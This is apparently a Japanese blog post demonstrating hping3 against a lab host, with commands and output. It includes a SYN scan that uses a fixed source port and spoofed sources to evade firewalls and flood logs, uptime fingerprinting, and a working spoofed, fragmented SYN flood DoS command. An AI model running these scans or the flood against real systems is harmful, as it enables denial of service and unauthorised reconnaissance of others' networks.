hping3

/ Linux/Unix / Comment[0]
ファイアウォールの挙動チェック、ポートスキャン、DoS攻撃など色々と使えるhping3のちょっと便利な使い方

well-known portsをSYNスキャン
ソースポートを88に固定しFWを回避、ソースアドレスを偽装したパケットも混ぜてログを溢れさせる
nmap -g 88 -sS -D ip,ip,ME,ip 10.0.1.1 -p1-1023とほぼ同じ
# hping3 -8 1-1023 -S 10.0.1.1 -s 88 --rand-source --fast
Scanning 10.0.1.1 (10.0.1.1), port 1-1023
1024 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name | flags |ttl| id | win | len |
+----+-----------+---------+---+-----+-----+-----+
21 ftp : .S..A... 64 0 5840 46
53 domain : .S..A... 64 0 5840 46
80 www : .S..A... 64 0 5840 46
139 netbios-ssn: .S..A... 64 0 5840 46
445 microsoft-d: .S..A... 64 0 5840 46
All replies received. Done.


FINスキャン
nmap -sF 10.0.1.1 -p1-1023とほぼ同じ
# hping3 -8 1-1023 -F 10.0.1.1
Scanning 10.0.1.1 (10.0.1.1), port 1-1023
1024 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name | flags |ttl| id | win | len |
+----+-----------+---------+---+-----+-----+-----+
All replies received. Done.
Not responding ports: (21 ftp) (53 domain) (80 www) (139 netbios-ssn) (445 microsoft-d)


開いてるポートにSYNパケットを送りTCPタイムスタンプを取得
# hping3 -S -p 21 --tcp-timestamp 10.0.1.1
HPING 10.0.1.1 (wlan0 10.0.1.1): S set, 40 headers + 0 data bytes
len=56 ip=10.0.1.1 ttl=64 DF id=0 sport=21 flags=SA seq=0 win=5792 rtt=2.4 ms
TCP timestamp: tcpts=189213915

len=56 ip=10.0.1.1 ttl=64 DF id=0 sport=21 flags=SA seq=1 win=5792 rtt=2.3 ms
TCP timestamp: tcpts=189214015
HZ seems hz=100
System uptime seems: 21 days, 21 hours, 35 minutes, 40 seconds
^C
--- 10.0.1.1 hping statistic ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 2.0/2.3/2.4 ms


SYN Flood攻撃
--rand-sourceソースアドレスを偽装して-fフラグメント化したパケットを--floodする
# hping3 -f -S 10.0.1.1 -p 80 --rand-source --flood
HPING 10.0.1.1 (wlan0 10.0.1.1): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- 10.0.1.1 hping statistic ---
17361 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms


受けマシンのnetstatを見てみると色々なIPからSYN_RECVしてることが分かる。
RFCでは、SYNを受け取った場合はSYN+ACKを返し、更に相手からのSYNを待つようになってるが、
ソースアドレスは偽装されており届かず。タイムアウトまでリソースが開放できないという地獄
# netstat -atn
tcp        0      0 10.0.1.1:80             253.218.178.150:2143    SYN_RECV   
tcp 0 0 10.0.1.1:80 121.153.69.169:2842 SYN_RECV
tcp 0 0 10.0.1.1:80 142.144.231.59:2849 SYN_RECV
tcp 0 0 10.0.1.1:80 147.160.78.241:2866 SYN_RECV
tcp 0 0 10.0.1.1:80 160.54.46.25:2856 SYN_RECV
tcp 0 0 10.0.1.1:80 187.158.78.27:2864 SYN_RECV
tcp 0 0 10.0.1.1:80 56.51.76.247:2142 SYN_RECV
tcp 0 0 10.0.1.1:80 73.46.17.208:2841 SYN_RECV
tcp 0 0 10.0.1.1:80 153.177.8.196:2869 SYN_RECV
:


ICMPパケットのTTLを1,2,3と1ずつ増やして送り、ICMP Time Exceededを返したホストを表示する
tracepathやtracertと同じ
# hping3 -1 -T nsa.gov
HPING nsa.gov (wlan0 12.120.184.8): icmp mode set, 28 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=10.255.0.1 name=ntt.setup
hop=1 hoprtt=1.2 ms
hop=2 ***
hop=2 hoprtt=6.3 ms
hop=3 ***
hop=3 hoprtt=13.5 ms
hop=4 ***
hop=4 hoprtt=10.6 ms
hop=5 ***
hop=5 hoprtt=47.9 ms
hop=6 TTL 0 during transit from ip=61.213.161.17 name=xe-5-0-3.a21.tokyjp01.jp.ra.gin.ntt.net
hop=6 hoprtt=9.6 ms
hop=7 TTL 0 during transit from ip=61.213.162.165 name=ae-7.r24.tokyjp01.jp.bb.gin.ntt.net
hop=7 hoprtt=13.4 ms
hop=8 TTL 0 during transit from ip=129.250.2.92 name=ae-9.r20.tokyjp01.jp.bb.gin.ntt.net
hop=8 hoprtt=33.7 ms
hop=9 TTL 0 during transit from ip=129.250.4.189 name=as-1.r20.sttlwa01.us.bb.gin.ntt.net
hop=9 hoprtt=108.7 ms
hop=10 TTL 0 during transit from ip=129.250.5.43 name=ae-1.r04.sttlwa01.us.bb.gin.ntt.net
hop=10 hoprtt=130.6 ms
hop=11 TTL 0 during transit from ip=192.205.34.117 name=UNKNOWN
hop=11 hoprtt=169.1 ms
hop=12 TTL 0 during transit from ip=12.122.84.18 name=cr82.st0wa.ip.att.net
hop=12 hoprtt=126.3 ms
hop=13 TTL 0 during transit from ip=12.122.5.230 name=cr2.ptdor.ip.att.net
hop=13 hoprtt=157.4 ms
hop=14 TTL 0 during transit from ip=12.122.30.141 name=cr1.ptdor.ip.att.net
hop=14 hoprtt=142.2 ms
hop=15 TTL 0 during transit from ip=12.122.30.146 name=cr1.sffca.ip.att.net
hop=15 hoprtt=132.8 ms
hop=16 TTL 0 during transit from ip=12.122.3.122 name=cr1.la2ca.ip.att.net
hop=16 hoprtt=122.0 ms
hop=17 TTL 0 during transit from ip=12.123.30.101 name=UNKNOWN
hop=17 hoprtt=141.1 ms
len=46 ip=12.120.184.8 ttl=50 id=32645 icmp_seq=20 rtt=150.9 ms
len=46 ip=12.120.184.8 ttl=51 id=33347 icmp_seq=21 rtt=150.9 ms
len=46 ip=12.120.184.8 ttl=50 id=33634 icmp_seq=22 rtt=145.7 ms
len=46 ip=12.120.184.8 ttl=51 id=33891 icmp_seq=23 rtt=137.5 ms
^C
--- nsa.gov hping statistic ---
25 packets transmitted, 24 packets received, 4% packet loss
round-trip min/avg/max = 1.2/92.9/169.1 ms


TTLを17に指定してICMP Request
# hping3 -1 nsa.gov -t 17
HPING nsa.gov (wlan0 12.120.186.8): icmp mode set, 28 headers + 0 data bytes
len=46 ip=12.120.186.8 ttl=50 id=25901 icmp_seq=0 rtt=120.4 ms
len=46 ip=12.120.186.8 ttl=51 id=26120 icmp_seq=1 rtt=124.0 ms
^C
--- nsa.gov hping statistic ---
3 packets transmitted, 2 packets received, 34% packet loss
round-trip min/avg/max = 120.4/122.2/124.0 ms
関連記事

コメント

:
:
:
:
:
管理人のみ表示を許可